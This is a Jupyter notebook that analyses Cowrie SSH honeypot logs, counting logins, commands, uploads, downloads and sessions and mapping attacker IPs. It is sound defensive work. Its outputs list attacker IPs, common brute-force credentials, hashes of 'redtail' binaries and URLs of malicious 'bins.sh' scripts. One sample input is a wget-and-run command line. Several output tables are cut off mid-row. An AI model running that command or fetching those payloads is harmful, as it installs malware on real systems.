# Cowrie Honeypot Log Analysis

Reference blog post: https://medium.com/@pedrinazzim/weekend-plan-cowrie-honeypot-log-analysis-afd707f801f6

This notebook simplifies the analysis of Cowrie honeypot logs when the honeypot is not configured to send data to an ELK stack, Splunk, or a similar platform. The analysis is structured in five categories. Each category covers a subset of the event ids that Cowrie can log, and together the five categories cover all possible event ids.
The categories are the following:
- Logins
- Commands
- File uploads and downloads
- Sessions
- Misc

**This notebook requires the following API:**
```
- IPInfo (IP map Report)
```

**This notebook works with the following packages:**
```
- os
- pandas
- datetime
- requests
- folium
```

Upload all your log files to a folder (I used `cowrie` as the name, but you can change it as you like) and watch Jupyter do a bit of magic ;)

If you prefer to do the analysis another way, a .csv file is also saved for every event id that has at least one event in the logs.

In [41]:
import os
import pandas as pd
from datetime import datetime
import requests
import folium

Let's start working on the logs. Create a dataframe and a .csv with all the events from multiple .json files (I assumed the file naming format `<filename>.json` for today's log and `<filename>.json.<YYYY-MM-DD>` for the logs of earlier days).

In [42]:
# Define the folder containing the JSON files
folder_path = 'cowrie'

# List all JSON log files in the folder (skips unrelated entries such as checkpoint folders)
json_files = [f for f in os.listdir(folder_path) if '.json' in f]

# Sort files by date (assuming date is part of the filename in format 'YYYY-MM-DD')
json_files.sort(key=lambda x: datetime.strptime(x.split('.')[-1], '%Y-%m-%d') if '-' in x else datetime.today())
print(json_files)

# Read and merge the JSON files into a single DataFrame
df = pd.concat(
    [pd.read_json(os.path.join(folder_path, file), lines = True) for file in json_files],
    ignore_index=True
)

# Export the merged DataFrame to CSV
df.to_csv('all_events.csv', index=False, escapechar='\\')

print(f"Number of events: {df.shape[0]}")
print("The 10 IPs with the most associated events:")
print(df['src_ip'].value_counts().head(10).to_markdown())

['cowrie.json.2024-12-13', 'cowrie.json.2024-12-14', 'cowrie.json']
Number of events: 8104
The 10 IPs with the most associated events:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |    3127 |
| 176.109.92.170 |    1417 |
| 37.44.238.68   |     556 |
| 83.222.191.62  |     500 |
| 2.57.122.195   |     316 |
| 139.59.208.44  |     305 |
| 178.160.195.60 |     232 |
| 195.178.110.67 |     189 |
| 159.89.181.166 |     172 |
| 2.57.122.194   |     161 |
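
The sort key in the cell above depends on the rotation suffix of each file name. Here is a minimal sketch of the same idea as a named helper, assuming rotated files end in `.YYYY-MM-DD` and the file without a date suffix is the log still being written. `rotation_date` is a hypothetical name used only for illustration, and it returns `datetime.max` for the live log (instead of today's date) so that file always sorts last.

```python
from datetime import datetime

def rotation_date(filename):
    """Return the date encoded in a rotated log name, or datetime.max for the live log."""
    suffix = filename.rsplit('.', 1)[-1]
    try:
        return datetime.strptime(suffix, '%Y-%m-%d')
    except ValueError:
        # No date suffix: assume this is the file still being written
        return datetime.max

files = ['cowrie.json', 'cowrie.json.2024-12-14', 'cowrie.json.2024-12-13']
ordered = sorted(files, key=rotation_date)
print(ordered)
```

Using a `try`/`except` around `strptime` means a file name that merely contains a hyphen does not break the sort.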


Filter the dataframe by event type (see https://cowrie.readthedocs.io/en/latest/OUTPUT.html) and export the results to CSV

In [43]:
# Shared attributes
shared_attributes = ['message', 'sensor', 'timestamp', 'src_ip', 'session']

# Event-specific attributes
event_attributes = {
    'cowrie.client.fingerprint': ['username', 'fingerprint', 'key', 'type'],
    'cowrie.login.success': ['username', 'password'],
    'cowrie.login.failed': ['username', 'password'],
    'cowrie.client.size': ['width', 'height'],
    'cowrie.session.file_upload': ['filename', 'outfile', 'shasum'],
    'cowrie.command.input': ['input'],
    'cowrie.virustotal.scanfile': ['sha256', 'is_new', 'positives', 'total'],
    'cowrie.session.connect': ['src_ip', 'src_port', 'dst_ip', 'dst_port'],
    'cowrie.client.version': ['version'],
    'cowrie.client.kex': ['hassh', 'hasshAlgorithms', 'kexAlgs', 'keyAlgs'],
    'cowrie.session.closed': ['duration'],
    'cowrie.log.closed': ['duration', 'ttylog', 'size', 'shasum', 'duplicate'],
    'cowrie.direct-tcpip.request': ['dst_ip', 'dst_port', 'src_ip', 'src_port'],
    'cowrie.direct-tcpip.data': ['dst_ip', 'dst_port'],
    'cowrie.client.var': ['name', 'value'],
    'cowrie.session.file_download': ['url','outfile','shasum'],
    'cowrie.session.params': ['arch'],
    'cowrie.command.failed': ['input']
}

# Function to filter and highlight attributes
def filter_event_data(df, eventid, shared_attributes, event_attributes):
    specific_attributes = event_attributes.get(eventid, [])
    columns_to_select = shared_attributes + specific_attributes
    columns_to_select = list(dict.fromkeys(columns_to_select)) #used to remove duplicate src_ip in cowrie.direct-tcpip.request events
    columns_to_select = [col for col in columns_to_select if col in df.columns]  # Ensure columns exist
    return df[df['eventid'] == eventid][columns_to_select]

# Filter data for each event
filtered_data = {}
for eventid in event_attributes.keys():
    filtered_data[eventid] = filter_event_data(df, eventid, shared_attributes, event_attributes)
    print(f"Number of events for {eventid}: {filtered_data[eventid].shape[0]}")

print("---")
# Export filtered data to csv
for eventid, data in filtered_data.items():
    num_events = data.shape[0]
    if num_events > 0:
        data.to_csv(f"{eventid}_filtered.csv", index=False, escapechar='\\')
        print(f"Data for {eventid} exported to {eventid}_filtered.csv")
    else:
        print(f"No events found for {eventid}; skipping export.")

Number of events for cowrie.client.fingerprint: 1
Number of events for cowrie.login.success: 248
Number of events for cowrie.login.failed: 1139
Number of events for cowrie.client.size: 3
Number of events for cowrie.session.file_upload: 42
Number of events for cowrie.command.input: 219
Number of events for cowrie.virustotal.scanfile: 0
Number of events for cowrie.session.connect: 1558
Number of events for cowrie.client.version: 1442
Number of events for cowrie.client.kex: 1425
Number of events for cowrie.session.closed: 1558
Number of events for cowrie.log.closed: 211
Number of events for cowrie.direct-tcpip.request: 8
Number of events for cowrie.direct-tcpip.data: 6
Number of events for cowrie.client.var: 0
Number of events for cowrie.session.file_download: 27
Number of events for cowrie.session.params: 211
Number of events for cowrie.command.failed: 6
---
Data for cowrie.client.fingerprint exported to cowrie.client.fingerprint_filtered.csv
Data for cowrie.login.success exported to cowrie.login.success_filtered.csv
Data for cowrie.login.f
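
The filtering step above selects rows by `eventid` and keeps only the shared and event-specific columns. A dependency-free sketch of the same logic on plain dictionaries may make the column handling easier to follow. `select_event` and the sample records are hypothetical and hand-written, not real honeypot data.

```python
def select_event(events, eventid, shared, specific):
    """Keep events matching eventid and project them onto the wanted keys."""
    # dict.fromkeys removes duplicate column names while preserving first-seen order
    columns = list(dict.fromkeys(shared + specific.get(eventid, [])))
    return [
        {col: event[col] for col in columns if col in event}
        for event in events
        if event.get('eventid') == eventid
    ]

# Hand-written sample records for illustration only
events = [
    {'eventid': 'cowrie.session.connect', 'src_ip': '192.0.2.1',
     'session': 'a1', 'src_port': 40000, 'protocol': 'ssh'},
    {'eventid': 'cowrie.login.failed', 'src_ip': '192.0.2.1',
     'session': 'a1', 'username': 'root', 'password': '123456'},
]
shared = ['src_ip', 'session']
specific = {'cowrie.session.connect': ['src_ip', 'src_port']}

rows = select_event(events, 'cowrie.session.connect', shared, specific)
print(rows)
```

Here `src_ip` appears in both lists but is kept only once, which is the same reason the notebook deduplicates `columns_to_select`.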

## Logins

Analysis of successful and failed logins

### cowrie.login.success

Successful logins. The code below prints:
- the total number of events for this event id
- the most frequent usernames and passwords used by threat actors in successful login attempts (limited to 10)
- the 10 IPs with the highest number of successful logins
- all the data related to this event id

In [44]:
# Number of rows
num_rows_login_ok = filtered_data['cowrie.login.success'].shape[0]
if num_rows_login_ok > 0:
  # The 10 most frequent usernames
  most_frequent_usernames_login_ok = filtered_data['cowrie.login.success']['username'].value_counts().head(10)

  # The 10 most frequent passwords
  most_frequent_passwords_login_ok = filtered_data['cowrie.login.success']['password'].value_counts().head(10)

  # Number of interactions per IP (filter top 10)
  ip_interactions_login_ok = filtered_data['cowrie.login.success']['src_ip'].value_counts().head(10)

  print(f"Number of successful logins: {num_rows_login_ok}")
  print("---")
  print("The 10 most frequent usernames used by threat actors")
  print(most_frequent_usernames_login_ok.to_markdown())
  print("---")
  print("The 10 most frequent passwords used by threat actors")
  print(most_frequent_passwords_login_ok.to_markdown())
  print("---")
  print("Top 10 source IPs with the highest number of successful login attempts:")
  print(ip_interactions_login_ok.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.login.success':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.login.success'].to_markdown())

Number of successful logins: 248
---
The 10 most frequent usernames used by threat actors
| username   |   count |
|:-----------|--------:|
| root       |     248 |
---
The 10 most frequent passwords used by threat actors
| password                |   count |
|:------------------------|--------:|
|                         |      14 |
| admin                   |      10 |
| ubnt                    |       8 |
| password                |       6 |
| 0                       |       6 |
| kjashd123sadhj123dhs1SS |       5 |
| toor                    |       4 |
| ftpuser                 |       4 |
| 12345678                |       4 |
| ------fuck------        |       4 |
---
Top 10 source IPs with the highest number of successful login attempts:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |      91 |
| 176.109.92.170 |      60 |
| 37.44.238.68   |      18 |
| 178.160.195.60 |      10 |
| 87.120.113.231 |       7 |
| 45.148.10.203  |       6 |
| 46.19.143.66   |

### cowrie.login.failed

Failed logins. The code below prints:
- the total number of events for this event id
- the most frequent usernames and passwords used by threat actors in failed logins (limited to 10)
- the 10 IPs with the highest number of failed login attempts
- all the data related to this event id

In [45]:
# Number of rows
num_rows_login_fail = filtered_data['cowrie.login.failed'].shape[0]
if num_rows_login_fail > 0:
  # The 10 most frequent usernames
  most_frequent_usernames_login_fail = filtered_data['cowrie.login.failed']['username'].value_counts().head(10)

  # The 10 most frequent passwords
  most_frequent_passwords_login_fail = filtered_data['cowrie.login.failed']['password'].value_counts().head(10)

  # Number of interactions per IP (filter top 10)
  ip_interactions_login_fail = filtered_data['cowrie.login.failed']['src_ip'].value_counts().head(10)

  print(f"Number of logins failed: {num_rows_login_fail}")
  print("---")
  print("Most frequent username used by threat actors")
  print(most_frequent_usernames_login_fail.to_markdown())
  print("---")
  print("Most frequent password used by threat actors")
  print(most_frequent_passwords_login_fail.to_markdown())
  print("---")
  print("Top 10 source IPs with the highest number of failed login attempts:")
  print(ip_interactions_login_fail.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.login.failed':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.login.failed'].to_markdown())

Number of logins failed: 1139
---
Most frequent username used by threat actors
| username   |   count |
|:-----------|--------:|
| admin      |      33 |
| ubuntu     |      30 |
| ftpuser    |      30 |
| oracle     |      21 |
| debian     |      21 |
| steam      |      17 |
| test       |      16 |
| ubnt       |      15 |
| postgres   |      14 |
| solana     |      14 |
---
Most frequent password used by threat actors
| password   |   count |
|:-----------|--------:|
| 123456     |     166 |
| 123        |      45 |
| password   |      23 |
| admin      |      19 |
| 1          |      19 |
| ftpuser    |      16 |
| 12345678   |      16 |
| root       |      13 |
| ubnt       |      11 |
| 111111     |      10 |
---
Top 10 source IPs with the highest number of failed login attempts:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |     479 |
| 176.109.92.170 |     187 |
| 83.222.191.62  |     100 |
| 37.44.238.68   |      77 |
| 2.57.122.195   |      62 
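
The login cells count usernames and passwords separately. If the combination matters, the two fields can be counted as pairs. The following is a minimal sketch using only the standard library. `top_credential_pairs` is a hypothetical helper, and the sample records are made up for illustration.

```python
from collections import Counter

def top_credential_pairs(events, n=10):
    """Count (username, password) pairs across login events and return the n most common."""
    pairs = Counter(
        (event['username'], event['password'])
        for event in events
        if 'username' in event and 'password' in event
    )
    return pairs.most_common(n)

# Made-up login events for illustration only
sample = [
    {'username': 'root', 'password': 'admin'},
    {'username': 'root', 'password': 'admin'},
    {'username': 'ubnt', 'password': 'ubnt'},
]
top = top_credential_pairs(sample)
print(top)
```

With the notebook's dataframes, the same records could be obtained from `filtered_data['cowrie.login.failed']` by converting the rows to dictionaries.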

## Commands

Analysis of the commands executed on the honeypot

### cowrie.command.input

The code below prints:
- the total number of events for this event id
- the most frequent command
- the IP with the highest number of interactions, together with that number
- the IPs that executed the most commands (limited to 10)
- the 10 most frequent commands
- all the data associated with this event id

In [46]:
# Number of rows
num_rows_commands = filtered_data['cowrie.command.input'].shape[0]
if num_rows_commands > 0:
  # Most frequent command
  most_frequent_command = filtered_data['cowrie.command.input']['input'].value_counts().idxmax()

  # Top 10 most frequent commands
  top10_commands = filtered_data['cowrie.command.input']['input'].value_counts().head(10)

  # IP with highest interactions
  most_interactive_ip_commands = filtered_data['cowrie.command.input']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_commands = filtered_data['cowrie.command.input']['src_ip'].value_counts().max()

  # Number of interactions per IP (filter top 10)
  ip_interactions_commands = filtered_data['cowrie.command.input']['src_ip'].value_counts().head(10)

  print(f"Number of events: {num_rows_commands}")
  print(f"Most frequent command: {most_frequent_command}")
  print(f"IP with highest interactions: {most_interactive_ip_commands}, number of interactions: {most_interactive_ip_count_commands}")
  print("---")
  print("IPs that executed more commands (top 10)")
  print(ip_interactions_commands.to_markdown())
  print("---")
  print("Top 10 most frequent commands:")
  print(top10_commands.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.command.input':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.command.input'].to_markdown())

Number of events: 219
Most frequent command: uname -s -v -n -r -m
IP with highest interactions: 87.120.127.241, number of interactions: 91
---
IPs that executed more commands (top 10)
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |      91 |
| 176.109.92.170 |      60 |
| 37.44.238.68   |      18 |
| 46.19.143.66   |      10 |
| 59.9.168.196   |       8 |
| 87.120.113.231 |       7 |
| 45.148.10.203  |       6 |
| 94.103.125.7   |       6 |
| 195.178.110.67 |       4 |
| 2.57.122.194   |       3 |
---
Top 10 most frequent commands:
| input                                                                                                                                                                                                                                                                                                                                                                                                                                          
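
Full command lines are often long chains, so counting them verbatim can hide which programs are actually invoked. As a rough sketch, the input can be split on common shell separators and the first token of each part counted. This is a naive approach that ignores quoting and subshells. `program_names` and the sample inputs are hypothetical.

```python
import re
from collections import Counter

# Naive separators for chained shell commands: ;  &&  ||  |
SEPARATORS = re.compile(r'\s*(?:;|&&|\|\||\|)\s*')

def program_names(command_line):
    """Return the first token of each chained sub-command (ignores quoting)."""
    parts = [part for part in SEPARATORS.split(command_line) if part.strip()]
    return [part.split()[0] for part in parts]

# Made-up command inputs for illustration only
inputs = [
    'uname -s -v -n -r -m',
    'cd /tmp; wget http://192.0.2.9/x.sh && sh x.sh',
    'uname -a | grep x86',
]
counts = Counter(name for line in inputs for name in program_names(line))
print(counts.most_common(3))
```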

### cowrie.command.failed

Commands that failed their execution on Cowrie. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [47]:
# Number of events
num_rows_command_failed = filtered_data['cowrie.command.failed'].shape[0]

print(f"Number of events: {num_rows_command_failed}")
print("---")
print("Filtered data for 'cowrie.command.failed':") #cut for the github
print("---cut for github version---")
#print(filtered_data['cowrie.command.failed'].to_markdown())

Number of events: 6
---
Filtered data for 'cowrie.command.failed':
---cut for github version---


## File Uploads and Downloads

Analysis of the files uploaded and downloaded to/from the honeypot

### cowrie.session.file_upload

Files uploaded to Cowrie, generally through SFTP or SCP. The code below prints:
- the total number of events for this event id
- the number of uploads per IP
- a detailed view of the files uploaded
- all the data related to this event id

In [48]:
# Number of rows
num_rows_uploads = filtered_data['cowrie.session.file_upload'].shape[0]
if num_rows_uploads > 0:
  # Number of interactions per IP (filter top 10)
  ip_interactions_uploads = filtered_data['cowrie.session.file_upload']['src_ip'].value_counts().head(10)

  # Files uploaded view (shasum, srcip, filename)
  file_uploads_detail = filtered_data['cowrie.session.file_upload'].groupby(['shasum', 'src_ip', 'filename']).size().reset_index(name='count')

  print(f"Number of events: {num_rows_uploads}")
  print("---")
  print("Number of uploads per IP (top 10):")
  print(ip_interactions_uploads.to_markdown())
  print("---")
  print("Files uploaded (detailed view)")
  print(file_uploads_detail.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.session.file_upload':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.file_upload'].to_markdown())

Number of events: 42
---
Number of uploads per IP (top 10):
| src_ip         |   count |
|:---------------|--------:|
| 87.120.113.231 |      42 |
---
Files uploaded (detailed view)
|    | shasum                                                           | src_ip         | filename       |   count |
|---:|:-----------------------------------------------------------------|:---------------|:---------------|--------:|
|  0 | 29f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b | 87.120.113.231 | redtail.x86_64 |       7 |
|  1 | 3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae | 87.120.113.231 | setup.sh       |       7 |
|  2 | 69dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586 | 87.120.113.231 | redtail.i686   |       7 |
|  3 | 992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472 | 87.120.113.231 | redtail.arm8   |       7 |
|  4 | d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4 | 87.120.113.231 | redtail.arm7   |   
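
The `shasum` values above are 64 hexadecimal characters long, which matches the length of a SHA-256 digest. Assuming that is the algorithm in use, a sample saved on disk can be hashed and compared with the logged value. `sha256_of_file` is a hypothetical helper, and the temporary file only stands in for a captured sample.

```python
import hashlib
import os
import tempfile

def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large samples do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, 'rb') as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()

# Stand-in for a captured sample: a temporary file with known content
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b'hello')
file_digest = sha256_of_file(tmp.name)
os.remove(tmp.name)
print(file_digest)
```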

### cowrie.session.file_download

Files downloaded to Cowrie. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [49]:
# Number of rows
num_rows_downloads = filtered_data['cowrie.session.file_download'].shape[0]
if num_rows_downloads > 0:
  # Files downloaded view (shasum, src_ip, url)
  file_downloads_detail = filtered_data['cowrie.session.file_download'].groupby(['shasum', 'src_ip', 'url']).size().reset_index(name='count')

  print(f"Number of events: {num_rows_downloads}")
  print("---")
  print("Files downloaded (detailed view)")
  print(file_downloads_detail.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.session.file_download':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.file_download'].to_markdown())

Number of events: 27
---
Files downloaded (detailed view)
|    | shasum                                                           | src_ip       | url                          |   count |
|---:|:-----------------------------------------------------------------|:-------------|:-----------------------------|--------:|
|  0 | 1fa505863d5045330db30b33a7668683f28d6481ff899c782c1d9273d56766a2 | 37.44.238.68 | http://87.121.86.228/bins.sh |       9 |
|  1 | d1c5f8343f38273e6943502feb87d97ddbb19123fc3e6c0b891a1fb248ec4d30 | 37.44.238.68 | http://37.44.238.68/bins.sh  |      18 |
---
Filtered data for 'cowrie.session.file_download':
---cut for github version---
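
In the output above, one download URL points back to the attacking IP itself and the other to a different host. A short sketch of how that comparison could be automated with the standard library follows. `download_host` is a hypothetical helper, and the two rows are copied from the table above.

```python
from urllib.parse import urlparse

def download_host(url):
    """Return the host part of a download URL, or None if it cannot be parsed."""
    return urlparse(url).hostname

# Rows taken from the detailed view above
rows = [
    {'src_ip': '37.44.238.68', 'url': 'http://87.121.86.228/bins.sh'},
    {'src_ip': '37.44.238.68', 'url': 'http://37.44.238.68/bins.sh'},
]
for row in rows:
    # True when the payload is served by the same IP that issued the command
    row['self_hosted'] = download_host(row['url']) == row['src_ip']
    print(row['url'], row['self_hosted'])
```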


## Sessions

Analysis of the sessions

### cowrie.session.connect

New connection. The code below prints:
- the total number of events for this event id
- the 10 src IPs with the highest number of sessions started
- all the data related to this event id
- an IP map report where each IP is geo-located

In [50]:
# Number of events
num_rows_session_connect = filtered_data['cowrie.session.connect'].shape[0]
if num_rows_session_connect > 0:
  # Top 10 most frequent IP
  top10_sessions = filtered_data['cowrie.session.connect']['src_ip'].value_counts().head(10)

  print(f"Number of events: {num_rows_session_connect}")
  print("Top 10 src IPs with most sessions:")
  print(top10_sessions.to_markdown())
  #print(" ")
  print("---")
  print("Filtered data for 'cowrie.session.connect':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.connect'].to_markdown())

Number of events: 1558
Top 10 src IPs with most sessions:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |     571 |
| 176.109.92.170 |     248 |
| 83.222.191.62  |     100 |
| 37.44.238.68   |      95 |
| 2.57.122.195   |      65 |
| 139.59.208.44  |      61 |
| 178.160.195.60 |      47 |
| 195.178.110.67 |      36 |
| 159.89.181.166 |      35 |
| 60.191.20.210  |      31 |
---
Filtered data for 'cowrie.session.connect':
---cut for github version---
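
Every event carries the shared `session` attribute, so events from the different categories can be tied back to one connection. The following is a minimal, dependency-free sketch of such a grouping. `summarize_sessions` and the sample events are hypothetical and only illustrate the idea.

```python
from collections import defaultdict

def summarize_sessions(events):
    """Group events by session id, keeping the source IP, event ids, and commands."""
    sessions = defaultdict(lambda: {'src_ip': None, 'eventids': [], 'commands': []})
    for event in events:
        summary = sessions[event['session']]
        summary['src_ip'] = summary['src_ip'] or event.get('src_ip')
        summary['eventids'].append(event['eventid'])
        if event['eventid'] == 'cowrie.command.input':
            summary['commands'].append(event.get('input', ''))
    return dict(sessions)

# Made-up events for illustration only
sample = [
    {'session': 'a1', 'src_ip': '192.0.2.1', 'eventid': 'cowrie.session.connect'},
    {'session': 'a1', 'src_ip': '192.0.2.1', 'eventid': 'cowrie.login.success'},
    {'session': 'a1', 'src_ip': '192.0.2.1', 'eventid': 'cowrie.command.input', 'input': 'uname -a'},
    {'session': 'b2', 'src_ip': '192.0.2.2', 'eventid': 'cowrie.session.connect'},
]
summary = summarize_sessions(sample)
print(summary['a1'])
```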


Get the geolocation of each IP (replace `YOUR-API-KEY` with your IPinfo API key, available at https://ipinfo.io/) and create the IP map report

In [51]:
# Replace the placeholder with your IPinfo API key
IPINFO_TOKEN = 'YOUR-API-KEY'

if num_rows_session_connect > 0:
  ip_addresses = list(filtered_data['cowrie.session.connect']['src_ip'].unique())
  print(f"Number of Unique IPs {len(ip_addresses)}")
  #print(ip_addresses)

  print("---")

  # Function to get geolocation data for an IP
  def get_geo_data(ip):
      url = f"https://ipinfo.io/{ip}?token={IPINFO_TOKEN}"
      # A timeout keeps one unresponsive lookup from hanging the whole cell
      response = requests.get(url, timeout=10)
      if response.status_code == 200:
          return response.json()
      else:
          return {"error": f"Failed to fetch data for {ip}, status code {response.status_code}"}

  # Fetch and print geolocation data for all IPs
  geo_data = {}
  for ip in ip_addresses:
      geo_data[ip] = get_geo_data(ip)

  # Print the results, if you want to
  # for ip, data in geo_data.items():
  #   print(f"IP: {ip}, Data: {data}")

  # Create a base map
  m = folium.Map(location=[20, 0], zoom_start=2)

  # Add markers for each IP
  for ip, data in geo_data.items():
      if "loc" in data:
          lat, lon = map(float, data["loc"].split(","))
          folium.Marker(location=[lat, lon], popup=f"IP: {ip}").add_to(m)

  display(m)

Number of Unique IPs 124
---
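
The map cell reads the `loc` field of each response as a `latitude,longitude` string. A small sketch of that parsing step as a separate function, tolerant of missing or malformed values, is shown below. `parse_loc` is a hypothetical helper and the records are made up, so no API call is needed to try it.

```python
def parse_loc(record):
    """Return (lat, lon) as floats from a record with a 'loc' string, or None."""
    loc = record.get('loc')
    if not loc:
        return None
    try:
        lat, lon = (float(part) for part in loc.split(','))
    except ValueError:
        # Raised for non-numeric parts and for a wrong number of parts
        return None
    return lat, lon

# Made-up records shaped like the dictionaries stored in geo_data
records = {
    '192.0.2.1': {'loc': '52.3740,4.8897'},
    '192.0.2.2': {'error': 'Failed to fetch data'},
    '192.0.2.3': {'loc': 'not-a-coordinate'},
}
coordinates = {ip: parse_loc(data) for ip, data in records.items()}
print(coordinates)
```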


### cowrie.session.closed

Information about closed sessions. The code below prints:
- the number of closed sessions
- the 10 IPs with the longest sessions
- all the data related to this event id

In [52]:
# Number of events
num_rows_session_closed = filtered_data['cowrie.session.closed'].shape[0]
if num_rows_session_closed > 0:
  # Find longest sessions
  # Sort the DataFrame by 'duration' in descending order to get the highest durations at the top
  sorted_df_sessions = filtered_data['cowrie.session.closed'].sort_values(by='duration', ascending=False)
  # Group by 'src_ip' and get the first row for each group (highest 'duration')
  top_10_src_ips_duration = sorted_df_sessions.groupby('src_ip').first()
  # Sort by 'duration' again to get the 10 highest durations across all src_ips
  top_10_src_ips_duration = top_10_src_ips_duration.sort_values(by='duration', ascending=False).head(10)

  print(f"Number of events: {num_rows_session_closed}")
  print("Top 10 src IPs with longest sessions:")
  print(top_10_src_ips_duration.to_markdown())
  #print(" ")
  print("---")
  print("Filtered data for 'cowrie.session.closed': ") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.closed'].to_markdown())

Number of events: 1558
Top 10 src IPs with longest sessions:
| src_ip          | message                             | sensor       | timestamp                        | session      |   duration |
|:----------------|:------------------------------------|:-------------|:---------------------------------|:-------------|-----------:|
| 117.83.194.85   | Connection lost after 182.1 seconds | 36ac07b4cb7d | 2024-12-15 06:47:28.888645+00:00 | 3e0d2d880423 |      182.1 |
| 154.218.13.200  | Connection lost after 120.1 seconds | d25a97e65075 | 2024-12-13 21:28:41.818277+00:00 | afa4107bbe9a |      120.1 |
| 39.129.23.197   | Connection lost after 120.1 seconds | 36ac07b4cb7d | 2024-12-14 17:23:51.876513+00:00 | a2f92943c392 |      120.1 |
| 47.108.137.159  | Connection lost after 120.1 seconds | 36ac07b4cb7d | 2024-12-15 01:22:53.306353+00:00 | 24811f0e5570 |      120.1 |
| 121.43.234.8    | Connection lost after 120.1 seconds | 36ac07b4cb7d | 2024-12-15 06:57:36.218472+00:00 | 5d4423adba71 | 
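
The cell above finds the longest session per IP by sorting, grouping, and sorting again. The same result can be sketched without pandas by tracking the maximum duration per IP in a dictionary. `longest_session_per_ip` is a hypothetical helper and the events are made up for illustration.

```python
def longest_session_per_ip(events, n=10):
    """Return up to n (src_ip, duration) pairs, one per IP, longest first."""
    longest = {}
    for event in events:
        ip = event['src_ip']
        duration = float(event['duration'])
        # Keep only the longest duration seen so far for this IP
        if duration > longest.get(ip, -1.0):
            longest[ip] = duration
    return sorted(longest.items(), key=lambda item: item[1], reverse=True)[:n]

# Made-up session.closed events for illustration only
sample = [
    {'src_ip': '192.0.2.1', 'duration': 12.5},
    {'src_ip': '192.0.2.1', 'duration': 120.1},
    {'src_ip': '192.0.2.2', 'duration': 30.0},
]
ranking = longest_session_per_ip(sample)
print(ranking)
```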

## Misc

Analysis of miscellaneous data

### cowrie.client.size

Width and height of the user's terminal, as communicated through the SSH protocol.
The code below prints:
- the total number of events for this event id
- the IP with the highest number of interactions, together with that number
- all the data related to this event id

In [53]:
# Number of rows
num_rows_client_size = filtered_data['cowrie.client.size'].shape[0]
if num_rows_client_size > 0:
  # IP with highest interactions
  most_interactive_ip_client_size = filtered_data['cowrie.client.size']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_client_size = filtered_data['cowrie.client.size']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_client_size}")
  print(f"IP with highest number of interactions: {most_interactive_ip_client_size}, number of interactions: {most_interactive_ip_count_client_size}")
  print("---")
  print("Filtered data for 'cowrie.client.size':")
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.size'].to_markdown()) #---cut for github version---

Number of events: 3
IP with highest number of interactions: 94.103.125.7, number of interactions: 3
---
Filtered data for 'cowrie.client.size':
---cut for github version---


### cowrie.client.fingerprint

If the attacker attempts to log in with an SSH public key, it is logged here.
The code below prints:
- the total number of events for this event id
- the IP with the highest number of interactions, together with that number
- all the data related to this event id

In [54]:
# Number of rows
num_rows_client_fingerprint = filtered_data['cowrie.client.fingerprint'].shape[0]
if num_rows_client_fingerprint > 0:
  # IP with highest interactions
  most_interactive_ip_client_fingerprint = filtered_data['cowrie.client.fingerprint']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_client_fingerprint = filtered_data['cowrie.client.fingerprint']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_client_fingerprint}")
  print(f"IP with highest interactions: {most_interactive_ip_client_fingerprint}, number of interactions: {most_interactive_ip_count_client_fingerprint}")
  print("---")
  print("Filtered data for 'cowrie.client.fingerprint':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.fingerprint'].to_markdown())

Number of events: 1
IP with highest interactions: 45.84.107.198, number of interactions: 1
---
Filtered data for 'cowrie.client.fingerprint':
---cut for github version---


### cowrie.client.version


SSH identification string. The code below prints:
- the total number of events for this event id
- the most frequent SSH version
- the IP with the highest number of interactions, together with that number
- all the data related to this event id

In [55]:
# Number of rows
num_rows_client_version = filtered_data['cowrie.client.version'].shape[0]
if num_rows_client_version > 0:
  # Most frequent SSH version
  most_frequent_ssh_version = filtered_data['cowrie.client.version']['version'].value_counts().idxmax()

  # IP with highest interactions
  most_interactive_ip_client_version = filtered_data['cowrie.client.version']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_client_version = filtered_data['cowrie.client.version']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_client_version}")
  print(f"Most frequent SSH version: {most_frequent_ssh_version}")
  print(f"IP with highest interactions: {most_interactive_ip_client_version}, number of interactions: {most_interactive_ip_count_client_version}")
  print("---")
  print("Filtered data for 'cowrie.client.version':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.version'].to_markdown())

Number of events: 1442
Most frequent SSH version: SSH-2.0-Go
